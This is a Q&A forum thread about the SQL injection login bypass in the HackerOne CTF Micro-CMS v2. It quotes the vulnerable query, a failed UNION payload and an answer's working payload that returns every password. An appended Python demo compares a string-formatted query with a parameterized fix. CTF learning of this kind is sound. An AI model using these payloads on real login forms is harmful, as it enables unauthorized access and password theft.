
I'm going through the beginner HackerOne CTFs and I'm trying to crack Micro-CMS v2. There is a login page that is vulnerable to SQL injection. The query goes like this:

'SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')

In the username field I input ' UNION SELECT '123' AS password WHERE '1'='1 but then it returns this error:

ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'WHERE '1'='1'' at line 1")

I tried commenting it out with --' or using WHERE 1=1' instead, but nothing seemed to work.

1 Answer

Maybe try to put UNION' or 1=1; -- in the username field.

So the query would become like this:

SELECT password FROM admins WHERE username='UNION' or 1=1; --

The result of this query would output all values in the password field.

Chris Albert
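Added here as an illustration (this is not code from the question, the answer, or the CTF itself): the page's string-formatted query next to a parameterized version, both run against a constructed in-memory SQLite table so you can see how the same input is treated. SQLite stands in for MariaDB, and the table contents and function names are assumptions.

```python
import sqlite3

# Constructed sample data standing in for the CTF's admins table.
ADMINS = [("admin", "s3cret-1"), ("ops", "s3cret-2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO admins VALUES (?, ?)", ADMINS)
    return conn


def lookup_vulnerable(conn, username):
    """Mirrors the query-building pattern shown in the question: the input is
    spliced into the SQL text with Python %-formatting, so a quote in the
    input ends the string literal and the rest is parsed as SQL.
    The .replace('%', '%%') is kept as it appears on the page."""
    query = "SELECT password FROM admins WHERE username='%s'" % (
        username.replace("%", "%%")
    )
    return [row[0] for row in conn.execute(query)]


def lookup_parameterized(conn, username):
    """The fix: the username is bound as a parameter and never becomes part of
    the SQL text, so quotes, 'or 1=1' and '--' are just characters."""
    rows = conn.execute(
        "SELECT password FROM admins WHERE username=?", (username,)
    )
    return [row[0] for row in rows]


def demo():
    """Runs the payload from the answer above through both versions."""
    conn = make_db()
    payload = "UNION' or 1=1; -- "
    return {
        "vulnerable": lookup_vulnerable(conn, payload),      # every password
        "parameterized": lookup_parameterized(conn, payload),  # no match
        "legit": lookup_parameterized(conn, "admin"),          # normal login
    }


if __name__ == "__main__":
    print(demo())
```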